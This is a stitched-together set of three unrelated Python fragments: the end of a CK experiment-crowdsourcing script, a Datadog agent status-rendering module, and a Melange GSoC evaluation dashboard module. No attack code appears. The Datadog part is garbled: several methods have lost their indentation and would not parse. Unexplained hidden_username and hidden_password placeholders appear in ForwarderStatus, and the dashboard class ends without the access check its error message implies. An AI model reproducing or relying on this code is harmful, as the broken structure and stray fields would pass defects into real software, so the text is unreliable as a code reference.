                    'module_uoa':cfg['module_deps']['experiment'],
                    'repo_uoa':e_repo_uoa,
                    'experiment_repo_uoa':e_remote_repo_uoa,
                    'experiment_uoa':e_uoa,
                    'sort_keys':'yes',
                    'dict':{
                        'dict':{'subview_uoa':cfg['data_deps']['subview_uoa']},
                        'tags':['crowdsource experiments','ck-paper','filter','if-conversion','speedup'],
                        'features':features,
                        'choices':xchoices,
                        'characteristics': {
                            'speedup_0':sd0,
                            'speedup_1':sd1,
                            'execution_time_div_by_repeat_opt0_ds0':t0d0,
                            'execution_time_div_by_repeat_opt0_ds1':t0d1,
                            'execution_time_div_by_repeat_opt1_ds0':t1d0,
                            'execution_time_div_by_repeat_opt1_ds1':t1d1
                        }
                    }
                   }
                r=ck.access(ii)
                if r['return']>0: return r
                ck.out('')
                ck.out(' Results shared successfully!')
                ck.out('')
                ck.out(' You can see all shared results at http://cknowledge.org/repo/web.php?wcid=bc0409fb61f0aa82:reproduce-ck-paper-filter-optimization')
        else:
            ck.out('')
            ck.out('Note: speedups/slowdowns were not detected on your platform!')
    ck.out('')
    ck.out('Thank you for participating in experiment crowdsourcing!')
    return {'return':0}
| |
# (C) Datadog, Inc. 2010-2016
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
"""
This module contains classes which are used to occasionally persist the status
of checks.
"""
# stdlib
from collections import defaultdict
import cPickle as pickle
import datetime
import logging
import os
import platform
import sys
import tempfile
import time
# 3p
import ntplib
import yaml
# project
import config
from config import _is_affirmative, _windows_commondata_path, get_config
from util import plural
from utils.jmx import JMXFiles
from utils.ntp import NTPUtil
from utils.pidfile import PidFile
from utils.platform import Platform
from utils.profile import pretty_statistics
# Status values rendered in agent/check status output.
STATUS_OK = 'OK'
STATUS_ERROR = 'ERROR'
STATUS_WARNING = 'WARNING'
# NTP offsets (seconds) larger than this are highlighted in red/bold.
NTP_OFFSET_THRESHOLD = 60
log = logging.getLogger(__name__)
class Stylizer(object):
    """ANSI terminal text styling. Disabled by default; callers flip
    ENABLED on (e.g. when stdout is a tty)."""

    # Style name -> ANSI SGR code.
    STYLES = {
        'bold': 1,
        'grey': 30,
        'red': 31,
        'green': 32,
        'yellow': 33,
        'blue': 34,
        'magenta': 35,
        'cyan': 36,
        'white': 37,
    }

    HEADER = '\033[1m'
    UNDERLINE = '\033[2m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    RESET = '\033[0m'

    ENABLED = False

    @classmethod
    def stylize(cls, text, *styles):
        """Wrap `text` in the escape for each named style, then reset."""
        if not cls.ENABLED:
            return text
        # don't bother about escaping, not that complicated.
        escape = '\033[%dm%s'
        for name in styles or []:
            text = escape % (cls.STYLES[name], text)
        return text + escape % (0, '')  # trailing reset
# A small convenience method: module-level shorthand for Stylizer.stylize.
def style(*args):
    """Return args[0] styled with the given style names (see Stylizer)."""
    return Stylizer.stylize(*args)
def logger_info():
    """Describe where the root logger currently writes, as a comma-joined
    string of stream names / syslog addresses."""
    root_logger = logging.getLogger()
    if not len(root_logger.handlers) > 0:
        return "No loggers configured"
    destinations = []
    for handler in root_logger.handlers:
        if isinstance(handler, logging.StreamHandler):
            try:
                destinations.append(handler.stream.name)
            except AttributeError:
                destinations.append("unnamed stream")
        if isinstance(handler, logging.handlers.SysLogHandler):
            # Address is either a path/host string or a (host, port) tuple.
            if isinstance(handler.address, basestring):
                destinations.append('syslog:%s' % handler.address)
            else:
                destinations.append('syslog:(%s, %s)' % handler.address)
    return ', '.join(destinations)
def get_ntp_info():
    """Query the configured NTP server and return (offset_seconds, styles);
    styles is ['red', 'bold'] when |offset| exceeds NTP_OFFSET_THRESHOLD."""
    req_args = NTPUtil().args
    ntp_offset = ntplib.NTPClient().request(**req_args).offset
    if abs(ntp_offset) > NTP_OFFSET_THRESHOLD:
        ntp_styles = ['red', 'bold']
    else:
        ntp_styles = []
    return ntp_offset, ntp_styles
class AgentStatus(object):
    """
    A small class used to load and save status messages to the filesystem.
    """
    # Subclasses set NAME to the human-readable component name.
    NAME = None
    def __init__(self):
        # Record when, and by which process, this status was produced.
        self.created_at = datetime.datetime.now()
        self.created_by_pid = os.getpid()
    def has_error(self):
        """Return True when this status contains an error (subclass hook)."""
        raise NotImplementedError
def persist(self):
try:
path = self._get_pickle_path()
log.debug("Persisting status to %s" % path)
f = open(path, 'w')
try:
pickle.dump(self, f)
finally:
f.close()
except Exception:
log.exception("Error persisting status")
def created_seconds_ago(self):
td = datetime.datetime.now() - self.created_at
return td.seconds
    def render(self):
        """Render this status as text: header lines, then the subclass's
        body_lines() indented, then a trailing blank line."""
        indent = "  "
        lines = self._header_lines(indent) + [
            indent + l for l in self.body_lines()
        ] + ["", ""]
        return "\n".join(lines)
@classmethod
def _title_lines(self):
name_line = "%s (v %s)" % (self.NAME, config.get_version())
lines = [
"=" * len(name_line),
"%s" % name_line,
"=" * len(name_line),
"",
]
return lines
def _header_lines(self, indent):
# Don't indent the header
lines = self._title_lines()
if self.created_seconds_ago() > 120:
styles = ['red', 'bold']
else:
styles = []
# We color it in red if the status is too old
fields = [
(
style("Status date", *styles),
style("%s (%ss ago)" % (
self.created_at.strftime('%Y-%m-%d %H:%M:%S'),
self.created_seconds_ago()), *styles
)
)
]
fields += [
("Pid", self.created_by_pid),
("Platform", platform.platform()),
("Python Version", "%s, %s" % (
platform.python_version(),
Platform.python_architecture())),
("Logs", logger_info()),
]
for key, value in fields:
l = indent + "%s: %s" % (key, value)
lines.append(l)
return lines + [""]
def to_dict(self):
return {
'pid': self.created_by_pid,
'status_date': "%s (%ss ago)" % (
self.created_at.strftime('%Y-%m-%d %H:%M:%S'),
self.created_seconds_ago()
),
}
@classmethod
def _not_running_message(cls):
lines = cls._title_lines() + [
style(" %s is not running." % cls.NAME, 'red'),
style(""" You can get more details in the logs:
%s""" % logger_info(), 'red'),
"",
""
]
return "\n".join(lines)
@classmethod
def remove_latest_status(cls):
log.debug("Removing latest status")
try:
os.remove(cls._get_pickle_path())
except OSError:
pass
@classmethod
def load_latest_status(cls):
try:
f = open(cls._get_pickle_path())
try:
return pickle.load(f)
finally:
f.close()
except IOError:
return None
@classmethod
def print_latest_status(cls, verbose=False):
cls.verbose = verbose
Stylizer.ENABLED = False
try:
if sys.stdout.isatty():
Stylizer.ENABLED = True
except Exception:
# Don't worry if we can't enable the
# stylizer.
pass
message = cls._not_running_message()
exit_code = -1
module_status = cls.load_latest_status()
if module_status:
message = module_status.render()
exit_code = 0
if module_status.has_error():
exit_code = 1
sys.stdout.write(message)
return exit_code
@classmethod
def _get_pickle_path(cls):
if Platform.is_win32():
path = os.path.join(_windows_commondata_path(), 'Datadog')
if not os.path.isdir(path):
path = tempfile.gettempdir()
elif os.path.isdir(PidFile.get_dir()):
path = PidFile.get_dir()
else:
path = tempfile.gettempdir()
return os.path.join(path, cls.__name__ + '.pickle')
class InstanceStatus(object):
    """Outcome of a single check instance run.

    Stores the status string plus optional error (as repr), traceback,
    warnings, metric count and per-run stats.
    """

    def __init__(self, instance_id, status, error=None, tb=None, warnings=None,
                 metric_count=None, instance_check_stats=None):
        self.instance_id = instance_id
        self.status = status
        # Keep only the repr of the error so the status stays picklable.
        self.error = repr(error) if error is not None else None
        self.traceback = tb
        self.warnings = warnings
        self.metric_count = metric_count
        self.instance_check_stats = instance_check_stats

    def has_error(self):
        return self.status == STATUS_ERROR

    def has_warnings(self):
        return self.status == STATUS_WARNING
class CheckStatus(object):
    """Aggregated status of one check across all of its instances."""

    def __init__(self, check_name, instance_statuses, metric_count=None,
                 event_count=None, service_check_count=None, service_metadata=None,
                 init_failed_error=None, init_failed_traceback=None,
                 library_versions=None, source_type_name=None,
                 check_stats=None):
        self.name = check_name
        self.source_type_name = source_type_name
        self.instance_statuses = instance_statuses
        self.metric_count = metric_count or 0
        self.event_count = event_count or 0
        self.service_check_count = service_check_count or 0
        self.init_failed_error = init_failed_error
        self.init_failed_traceback = init_failed_traceback
        self.library_versions = library_versions
        self.check_stats = check_stats
        # Fix: the default used to be a shared mutable list (service_metadata=[]);
        # every CheckStatus built without explicit metadata aliased — and could
        # mutate — the same list object.
        self.service_metadata = service_metadata if service_metadata is not None else []

    @property
    def status(self):
        """STATUS_ERROR if init failed or any instance errored, else STATUS_OK."""
        if self.init_failed_error:
            return STATUS_ERROR
        for instance_status in self.instance_statuses:
            if instance_status.status == STATUS_ERROR:
                return STATUS_ERROR
        return STATUS_OK

    def has_error(self):
        return self.status == STATUS_ERROR
class EmitterStatus(object):
    """Status of a single emitter; remembers the repr of the last error."""

    def __init__(self, name, error=None):
        self.name = name
        # A falsy error (None, empty) means the emitter is healthy.
        self.error = repr(error) if error else None

    @property
    def status(self):
        return STATUS_ERROR if self.error else STATUS_OK

    def has_error(self):
        return self.status != STATUS_OK
class CollectorStatus(AgentStatus):
    """Collector status: per-check results, emitter results and host
    metadata, renderable as text (body_lines) or as a dict (to_dict).
    """

    NAME = 'Collector'

    # Host metadata keys worth displaying; shared by body_lines() and
    # to_dict().
    METADATA_WHITELIST = [
        'hostname',
        'fqdn',
        'ipv4',
        'instance-id'
    ]

    def __init__(self, check_statuses=None, emitter_statuses=None, metadata=None):
        AgentStatus.__init__(self)
        self.check_statuses = check_statuses or []
        self.emitter_statuses = emitter_statuses or []
        self.host_metadata = metadata or []

    @property
    def status(self):
        # The collector is in error as soon as any single check is.
        for check_status in self.check_statuses:
            if check_status.status == STATUS_ERROR:
                return STATUS_ERROR
        return STATUS_OK

    def has_error(self):
        return self.status != STATUS_OK

    @staticmethod
    def check_status_lines(cs, verbose=True):
        """Render one CheckStatus as a list of text lines.

        Tracebacks are only included when `verbose` is true; the default
        preserves this helper's historical behavior. Fix: this is now the
        single renderer — body_lines() used to carry a near-identical,
        hand-maintained copy of this whole function.
        """
        check_lines = [
            '  ' + cs.name,
            '  ' + '-' * len(cs.name)
        ]
        if cs.init_failed_error:
            check_lines.append("  - initialize check class [%s]: %s" %
                               (style(STATUS_ERROR, 'red'),
                                repr(cs.init_failed_error)))
            if verbose and cs.init_failed_traceback:
                check_lines.extend('      ' + line for line in
                                   cs.init_failed_traceback.split('\n'))
        else:
            for s in cs.instance_statuses:
                c = 'green'
                if s.has_warnings():
                    c = 'yellow'
                if s.has_error():
                    c = 'red'
                line = "  - instance #%s [%s]" % (
                    s.instance_id, style(s.status, c))
                if s.has_error():
                    line += u": %s" % s.error
                if s.metric_count is not None:
                    line += " collected %s metrics" % s.metric_count
                if s.instance_check_stats is not None:
                    line += " Last run duration: %s" % s.instance_check_stats.get('run_time')
                check_lines.append(line)
                if s.has_warnings():
                    for warning in s.warnings:
                        warn = warning.split('\n')
                        if not len(warn):
                            continue
                        check_lines.append(u"      %s: %s" %
                                           (style("Warning", 'yellow'), warn[0]))
                        check_lines.extend(u"      %s" % l for l in
                                           warn[1:])
                if verbose and s.traceback is not None:
                    check_lines.extend('      ' + line for line in
                                       s.traceback.split('\n'))
        check_lines += [
            "  - Collected %s metric%s, %s event%s & %s service check%s" % (
                cs.metric_count, plural(cs.metric_count),
                cs.event_count, plural(cs.event_count),
                cs.service_check_count, plural(cs.service_check_count)),
        ]
        if cs.check_stats is not None:
            check_lines += [
                "  - Stats: %s" % pretty_statistics(cs.check_stats)
            ]
        if cs.library_versions is not None:
            check_lines += [
                "  - Dependencies:"]
            for library, version in cs.library_versions.iteritems():
                check_lines += ["    - %s: %s" % (library, version)]
        check_lines += [""]
        return check_lines

    @staticmethod
    def render_check_status(cs):
        indent = "  "
        lines = [
            indent + l for l in CollectorStatus.check_status_lines(cs)
        ] + ["", ""]
        return "\n".join(lines)

    def body_lines(self):
        """Assemble the full text body: clocks, paths, hostnames, checks,
        optional service metadata and emitters."""
        check_statuses = self.check_statuses + get_jmx_status()
        lines = self._clock_lines()
        lines += self._path_lines()
        lines += self._hostname_lines()
        lines += self._check_lines(check_statuses)
        lines += self._service_metadata_lines(check_statuses)
        lines += self._emitter_lines()
        return lines

    def _clock_lines(self):
        # NTP offset (styled red when out of bounds) and system clock.
        lines = [
            'Clocks',
            '======',
            ''
        ]
        try:
            ntp_offset, ntp_styles = get_ntp_info()
            lines.append(
                '  ' + style('NTP offset', *ntp_styles) + ': ' +
                style('%s s' % round(ntp_offset, 4), *ntp_styles))
        except Exception as e:
            lines.append('  NTP offset: Unknown (%s)' % str(e))
        lines.append('  System UTC time: ' + datetime.datetime.utcnow().__str__())
        lines.append('')
        return lines

    def _path_lines(self):
        # Paths to checks.d/conf.d, degrading to 'Not found'.
        lines = [
            'Paths',
            '=====',
            ''
        ]
        osname = config.get_os()
        try:
            confd_path = config.get_confd_path(osname)
        except config.PathNotFound:
            confd_path = 'Not found'
        try:
            checksd_path = config.get_checksd_path(osname)
        except config.PathNotFound:
            checksd_path = 'Not found'
        lines.append('  conf.d: ' + confd_path)
        lines.append('  checks.d: ' + checksd_path)
        lines.append('')
        return lines

    def _hostname_lines(self):
        # Whitelisted host metadata entries.
        lines = [
            'Hostnames',
            '=========',
            ''
        ]
        if not self.host_metadata:
            lines.append("  No host information available yet.")
        else:
            for key, host in self.host_metadata.iteritems():
                for whitelist_item in self.METADATA_WHITELIST:
                    if whitelist_item in key:
                        lines.append("  " + key + ": " + host)
                        break
        lines.append('')
        return lines

    def _check_lines(self, check_statuses):
        # Per-check sections, via the single shared renderer.
        lines = [
            'Checks',
            '======',
            ''
        ]
        if not check_statuses:
            lines.append("  No checks have run yet.")
        else:
            # Fix: `self.verbose` is only set when print_latest_status() ran;
            # default to non-verbose instead of raising AttributeError.
            verbose = getattr(self, 'verbose', False)
            for cs in check_statuses:
                lines += CollectorStatus.check_status_lines(cs, verbose=verbose)
        return lines

    def _service_metadata_lines(self, check_statuses):
        # Only rendered when the display_service_metadata config flag is on.
        if not _is_affirmative(get_config().get('display_service_metadata', False)):
            return []
        lines = [
            "",
            "Service metadata",
            "================",
            ""
        ]
        if not check_statuses:
            lines.append("  No checks have run yet.")
            return lines
        meta_lines = []
        for cs in check_statuses:
            # Check title
            check_line = [
                '  ' + cs.name,
                '  ' + '-' * len(cs.name)
            ]
            instance_lines = []
            for i, meta in enumerate(cs.service_metadata):
                if not meta:
                    continue
                instance_lines += ["  - instance #%s:" % i]
                for k, v in meta.iteritems():
                    instance_lines += ["    - %s: %s" % (k, v)]
            if instance_lines:
                check_line += instance_lines
                meta_lines += check_line
        if meta_lines:
            lines += meta_lines
        else:
            lines.append("  No metadata were collected.")
        return lines

    def _emitter_lines(self):
        lines = [
            "",
            "Emitters",
            "========",
            ""
        ]
        if not self.emitter_statuses:
            lines.append("  No emitters have run yet.")
        else:
            for es in self.emitter_statuses:
                c = 'red' if es.has_error() else 'green'
                line = "  - %s [%s]" % (es.name, style(es.status, c))
                if es.status != STATUS_OK:
                    line += ": %s" % es.error
                lines.append(line)
        return lines

    def to_dict(self):
        status_info = AgentStatus.to_dict(self)

        # Hostnames
        status_info['hostnames'] = {}
        if self.host_metadata:
            for key, host in self.host_metadata.iteritems():
                for whitelist_item in self.METADATA_WHITELIST:
                    if whitelist_item in key:
                        status_info['hostnames'][key] = host
                        break

        # Checks.d Status
        status_info['checks'] = {}
        check_statuses = self.check_statuses + get_jmx_status()
        for cs in check_statuses:
            status_info['checks'][cs.name] = {'instances': {}}
            if cs.init_failed_error:
                status_info['checks'][cs.name]['init_failed'] = True
                status_info['checks'][cs.name]['traceback'] = \
                    cs.init_failed_traceback or cs.init_failed_error
            else:
                # (a redundant re-initialization of this entry was dropped)
                status_info['checks'][cs.name]['init_failed'] = False
                for s in cs.instance_statuses:
                    instance_info = {
                        'status': s.status,
                        'has_error': s.has_error(),
                        'has_warnings': s.has_warnings(),
                    }
                    if s.has_error():
                        instance_info['error'] = s.error
                    if s.has_warnings():
                        instance_info['warnings'] = s.warnings
                    status_info['checks'][cs.name]['instances'][s.instance_id] = instance_info
                status_info['checks'][cs.name]['metric_count'] = cs.metric_count
                status_info['checks'][cs.name]['event_count'] = cs.event_count
                status_info['checks'][cs.name]['service_check_count'] = cs.service_check_count

        # Emitter status
        status_info['emitter'] = []
        for es in self.emitter_statuses:
            check_status = {
                'name': es.name,
                'status': es.status,
                'has_error': es.has_error(),
            }
            if es.has_error():
                check_status['error'] = es.error
            status_info['emitter'].append(check_status)

        # Paths
        osname = config.get_os()
        try:
            status_info['confd_path'] = config.get_confd_path(osname)
        except config.PathNotFound:
            status_info['confd_path'] = 'Not found'
        try:
            status_info['checksd_path'] = config.get_checksd_path(osname)
        except config.PathNotFound:
            status_info['checksd_path'] = 'Not found'

        # Clocks
        try:
            ntp_offset, ntp_style = get_ntp_info()
            warn_ntp = len(ntp_style) > 0
            status_info["ntp_offset"] = round(ntp_offset, 4)
        except Exception as e:
            ntp_offset = "Unknown (%s)" % str(e)
            warn_ntp = True
            status_info["ntp_offset"] = ntp_offset
        status_info["ntp_warning"] = warn_ntp
        status_info["utc_time"] = datetime.datetime.utcnow().__str__()

        return status_info
class DogstatsdStatus(AgentStatus):
    """Status of the dogstatsd server: flush/packet/metric/event counters."""

    NAME = 'Dogstatsd'

    # (attribute, display label) pairs, in report order.
    _COUNTER_LABELS = (
        ('flush_count', 'Flush count'),
        ('packet_count', 'Packet Count'),
        ('packets_per_second', 'Packets per second'),
        ('metric_count', 'Metric count'),
        ('event_count', 'Event count'),
        ('service_check_count', 'Service check count'),
    )

    def __init__(self, flush_count=0, packet_count=0, packets_per_second=0,
                 metric_count=0, event_count=0, service_check_count=0):
        AgentStatus.__init__(self)
        self.flush_count = flush_count
        self.packet_count = packet_count
        self.packets_per_second = packets_per_second
        self.metric_count = metric_count
        self.event_count = event_count
        self.service_check_count = service_check_count

    def has_error(self):
        # In error only when nothing at all has happened yet.
        return self.flush_count == 0 and self.packet_count == 0 and self.metric_count == 0

    def body_lines(self):
        return ["%s: %s" % (label, getattr(self, attr))
                for attr, label in self._COUNTER_LABELS]

    def to_dict(self):
        status_info = AgentStatus.to_dict(self)
        for attr, _ in self._COUNTER_LABELS:
            status_info[attr] = getattr(self, attr)
        return status_info
class ForwarderStatus(AgentStatus):
    """Status of the forwarder: transaction queue and flush counters."""

    NAME = 'Forwarder'

    def __init__(self, queue_length=0, queue_size=0, flush_count=0, transactions_received=0,
                 transactions_flushed=0, too_big_count=0):
        AgentStatus.__init__(self)
        self.queue_length = queue_length
        self.queue_size = queue_size
        self.flush_count = flush_count
        self.transactions_received = transactions_received
        self.transactions_flushed = transactions_flushed
        # Placeholders; presumably filled in elsewhere -- TODO confirm
        # against callers.
        self.hidden_username = None
        self.hidden_password = None
        self.too_big_count = too_big_count

    def body_lines(self):
        return [
            "Queue Size: %s bytes" % self.queue_size,
            "Queue Length: %s" % self.queue_length,
            "Flush Count: %s" % self.flush_count,
            "Transactions received: %s" % self.transactions_received,
            "Transactions flushed: %s" % self.transactions_flushed,
            "Transactions rejected: %s" % self.too_big_count,
            ""
        ]

    def has_error(self):
        # In error until at least one flush has happened.
        return self.flush_count == 0

    def to_dict(self):
        status_info = AgentStatus.to_dict(self)
        for attr in ('flush_count', 'queue_length', 'queue_size', 'too_big_count',
                     'transactions_received', 'transactions_flushed'):
            status_info[attr] = getattr(self, attr)
        return status_info
def get_jmx_instance_status(instance_name, status, message, metric_count):
    """Map a raw JMXFetch status string to an InstanceStatus.

    ERROR carries `message` as the error, WARNING carries it as a warning,
    OK carries only the metric count.

    Fix: an unrecognized status used to leave `instance_status` unbound and
    raise UnboundLocalError; it is now surfaced as an error status instead.
    """
    if status == STATUS_ERROR:
        return InstanceStatus(instance_name, STATUS_ERROR, error=message,
                              metric_count=metric_count)
    if status == STATUS_WARNING:
        return InstanceStatus(instance_name, STATUS_WARNING, warnings=[message],
                              metric_count=metric_count)
    if status == STATUS_OK:
        return InstanceStatus(instance_name, STATUS_OK,
                              metric_count=metric_count)
    return InstanceStatus(instance_name, STATUS_ERROR,
                          error="Unknown status: %r" % status,
                          metric_count=metric_count)
def get_jmx_status():
    """This function tries to read the 2 jmxfetch status file which are yaml file
    located in the temp directory.
    There are 2 files:
    - One generated by the Agent itself, for jmx checks that can't be initialized because
    there are missing stuff.
    Its format is as following:
    ###
    invalid_checks:
    jmx: !!python/object/apply:jmxfetch.InvalidJMXConfiguration [You need to have at
    least one instance defined in the YAML file for this check]
    timestamp: 1391040927.136523
    ###
    - One generated by jmxfetch that return information about the collection of metrics
    its format is as following:
    ###
    timestamp: 1391037347435
    checks:
    failed_checks:
    jmx:
    - {message: Unable to create instance. Please check your yaml file, status: ERROR}
    initialized_checks:
    tomcat:
    - {message: null, status: OK, metric_count: 7, instance_name: jmx-remihakim.fr-3000}
    ###

    Returns a list of CheckStatus (possibly empty); any failure to parse the
    files is logged and swallowed.
    """
    check_statuses = []
    java_status_path = JMXFiles.get_status_file_path()
    python_status_path = JMXFiles.get_python_status_file_path()
    if not os.path.exists(java_status_path) and not os.path.exists(python_status_path):
        log.debug("There is no jmx_status file at: %s or at: %s" % (java_status_path, python_status_path))
        return []

    # check name -> {'statuses': [...], 'metric_count': [...],
    #                'service_check_count': [...]}
    check_data = defaultdict(lambda: defaultdict(list))
    try:
        if os.path.exists(java_status_path):
            # NOTE(review): yaml.load (not safe_load) on a local status file;
            # acceptable only because the file is written by jmxfetch itself.
            # `file()` makes this Python 2 only.
            java_jmx_stats = yaml.load(file(java_status_path))

            status_age = time.time() - java_jmx_stats.get('timestamp')/1000  # JMX timestamp is saved in milliseconds
            jmx_checks = java_jmx_stats.get('checks', {})

            if status_age > 60:
                # Stale file: JMXFetch has stopped reporting; flag it.
                check_statuses.append(
                    CheckStatus("jmx", [
                        InstanceStatus(
                            0,
                            STATUS_ERROR,
                            error="JMXfetch didn't return any metrics during the last minute"
                        )
                    ])
                )
            else:
                # Collect per-instance results; the failed/initialized loops
                # are intentionally identical (only the source dict differs).
                for check_name, instances in jmx_checks.get('failed_checks', {}).iteritems():
                    for info in instances:
                        message = info.get('message', None)
                        metric_count = info.get('metric_count', 0)
                        service_check_count = info.get('service_check_count', 0)
                        status = info.get('status')
                        instance_name = info.get('instance_name', None)
                        check_data[check_name]['statuses'].append(get_jmx_instance_status(instance_name, status, message, metric_count))
                        check_data[check_name]['metric_count'].append(metric_count)
                        check_data[check_name]['service_check_count'].append(service_check_count)

                for check_name, instances in jmx_checks.get('initialized_checks', {}).iteritems():
                    for info in instances:
                        message = info.get('message', None)
                        metric_count = info.get('metric_count', 0)
                        service_check_count = info.get('service_check_count', 0)
                        status = info.get('status')
                        instance_name = info.get('instance_name', None)
                        check_data[check_name]['statuses'].append(get_jmx_instance_status(instance_name, status, message, metric_count))
                        check_data[check_name]['metric_count'].append(metric_count)
                        check_data[check_name]['service_check_count'].append(service_check_count)

                # Aggregate per-check totals across all instances.
                for check_name, data in check_data.iteritems():
                    check_status = CheckStatus(check_name, data['statuses'],
                                               metric_count=sum(data['metric_count']),
                                               service_check_count=sum(data['service_check_count']))
                    check_statuses.append(check_status)

        if os.path.exists(python_status_path):
            # Agent-side file: jmx checks that could not even be initialized.
            python_jmx_stats = yaml.load(file(python_status_path))
            jmx_checks = python_jmx_stats.get('invalid_checks', {})
            for check_name, excep in jmx_checks.iteritems():
                check_statuses.append(CheckStatus(check_name, [], init_failed_error=excep))
        return check_statuses

    except Exception:
        log.exception("Couldn't load latest jmx status")
        return []
| |
#!/usr/bin/env python2.5
#
# Copyright 2011 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for the GSoC organization page listing all evaluations.
"""
from django.utils.dateformat import format
from django.utils.translation import ugettext
from soc.logic.exceptions import AccessViolation
from soc.views.helper import lists
from soc.views.helper import url_patterns
from soc.views.helper.surveys import dictForSurveyModel
from soc.modules.gsoc.logic import project as project_logic
from soc.modules.gsoc.logic.evaluations import evaluationRowAdder
from soc.modules.gsoc.logic.survey_record import getEvalRecord
from soc.modules.gsoc.models.grading_project_survey import GradingProjectSurvey
from soc.modules.gsoc.models.grading_project_survey_record import \
GSoCGradingProjectSurveyRecord
from soc.modules.gsoc.models.project import GSoCProject
from soc.modules.gsoc.models.project_survey import ProjectSurvey
from soc.modules.gsoc.models.project_survey_record import \
GSoCProjectSurveyRecord
from soc.modules.gsoc.views import dashboard
from soc.modules.gsoc.views.helper.url_patterns import url
# Access-denied message raised by Dashboard.checkAccess() for users who are
# not an org admin anywhere in the program.
DEF_NOT_ADMIN = ugettext(
    'You must be an organization administrator for at least one '
    'organization in the program to access this page.')
class StudentEvaluationComponent(dashboard.Component):
    """Component for listing student evaluations for organizations."""

    def __init__(self, request, data, evals, idx):
        """Initializes this component.

        Args:
          request: The Django HTTP Request object
          data: The RequestData object containing the entities from the request
          evals: Dictionary containing evaluations for which the list must be built
          idx: The id for this list component
        """
        self.request = request
        self.data = data
        self.evals = evals
        self.idx = idx
        # Set by _getStatus() while a row is rendered; the created/modified
        # column renderers below read it afterwards for the same row.
        self.record = None

        list_config = lists.ListConfiguration(add_key_column=False)
        list_config.addColumn(
            'key', 'Key',
            (lambda ent, eval, *args: "%s/%s/%s" % (
                eval, ent.parent().key().name(),
                ent.key().id())), hidden=True)
        list_config.addColumn(
            'evaluation', 'Evaluation',
            lambda ent, eval, *args: eval.capitalize() if eval else '')
        list_config.addColumn(
            'student', 'Student',
            lambda entity, eval, *args: entity.parent().name())
        list_config.addSimpleColumn('title', 'Project Title')
        list_config.addColumn('org', 'Organization',
                              lambda entity, eval, *args: entity.org.name)
        list_config.addColumn(
            'mentors', 'Mentors',
            lambda ent, eval, mentors, *args: ', '.join(
                [mentors.get(m).name() for m in ent.mentors]))
        list_config.addColumn(
            'status', 'Status', self._getStatus)
        list_config.addColumn(
            'created', 'Submitted on',
            lambda ent, eval, *args: format(
                self.record.created, dashboard.DATETIME_FORMAT) if
                self.record else 'N/A')
        list_config.addColumn(
            'modified', 'Last modified on',
            lambda ent, eval, *args: format(
                self.record.modified, dashboard.DATETIME_FORMAT) if (
                self.record and self.record.modified) else 'N/A')
        list_config.setDefaultSort('student')

        def getRowAction(entity, eval, *args):
            # Records are only viewable once the survey has ended.
            eval_ent = self.evals.get(eval)
            if not self.data.timeline.afterSurveyEnd(eval_ent):
                return ''
            # Fix: local renamed from `url`, which shadowed the imported
            # url() helper.
            record_url = self.data.redirect.survey_record(
                eval, entity.key().id_or_name(),
                entity.parent().link_id).urlOf('gsoc_show_student_evaluation')
            return record_url
        list_config.setRowAction(getRowAction)

        self._list_config = list_config

    def _getStatus(self, entity, eval, *args):
        """Renders the submission status cell and caches the survey record
        for the date columns of the same row."""
        eval_ent = self.evals.get(eval)
        self.record = getEvalRecord(GSoCProjectSurveyRecord, eval_ent, entity)
        return dashboard.colorize(bool(self.record), "Submitted", "Not submitted")

    def context(self):
        """Returns the template context for this component."""
        # Fix: local renamed from `list`, which shadowed the builtin.
        list_response = lists.ListConfigurationResponse(
            self.data, self._list_config, idx=self.idx, preload_list=False)
        return {
            'name': 'student_evaluations',
            'lists': [list_response],
            'title': 'Student Evaluations',
            'description': ugettext('Student evaluations'),
            'idx': self.idx,
        }

    def getListData(self):
        """Returns the list data as requested by the current request.

        If the lists as requested is not supported by this component None is
        returned.
        """
        idx = lists.getListIndex(self.request)
        if idx != self.idx:
            return None
        list_query = project_logic.getProjectsQueryForEvalForOrgs(
            orgs=self.data.org_admin_for)
        starter = lists.keyStarter
        prefetcher = lists.listModelPrefetcher(
            GSoCProject, ['org'],
            ['mentors', 'failed_evaluations'],
            parent=True)
        row_adder = evaluationRowAdder(self.evals)
        response_builder = lists.RawQueryContentResponseBuilder(
            self.request, self._list_config, list_query,
            starter, prefetcher=prefetcher, row_adder=row_adder)
        return response_builder.build()

    def templatePath(self):
        # Fix: added the missing space after `return` (cosmetic only).
        return 'v2/modules/gsoc/dashboard/list_component.html'
class MentorEvaluationComponent(StudentEvaluationComponent):
    """Component for listing mentor evaluations for organizations."""

    def __init__(self, request, data, evals, idx):
        """Initializes this component.

        Args:
          request: The Django HTTP Request object
          data: The RequestData object containing the entities from the request
          evals: Dictionary containing evaluations for which the list must be built
          idx: The id for this list component
        """
        super(MentorEvaluationComponent, self).__init__(request, data, evals, idx)
        self.record = None
        self._list_config.addColumn(
            'grade', 'Grade', self._getGrade)
        self._list_config.setRowAction(
            lambda entity, eval, *args: data.redirect.survey_record(
                eval, entity.key().id_or_name(),
                entity.parent().link_id).urlOf('gsoc_take_mentor_evaluation'))

    def _getStatus(self, entity, eval, *args):
        """Renders the submission status cell using the mentor (grading)
        survey record model, and caches the record for _getGrade()."""
        eval_ent = self.evals.get(eval)
        self.record = getEvalRecord(GSoCGradingProjectSurveyRecord,
                                    eval_ent, entity)
        return dashboard.colorize(
            bool(self.record), "Submitted", "Not submitted")

    def _getGrade(self, entity, eval, *args):
        """Renders the grade cell; relies on self.record set by _getStatus()."""
        if self.record:
            return dashboard.colorize(
                self.record.grade, "Pass", "Fail")
        else:
            return "N/A"

    def context(self):
        context = super(MentorEvaluationComponent, self).context()
        context['title'] = 'Mentor Evaluations'
        # Fix: the description used to read 'Student evaluations', copied
        # verbatim from the parent class.
        context['description'] = ugettext('Mentor evaluations')
        context['name'] = 'mentor_evaluations'
        return context
class Dashboard(dashboard.DashboardPage):
    """View for the list of all the organization related components."""

    def djangoURLPatterns(self):
        """The URL pattern for the org evaluations."""
        return [
            url(r'dashboard/org/%s$' % url_patterns.PROGRAM, self,
                name='gsoc_org_dashboard')]

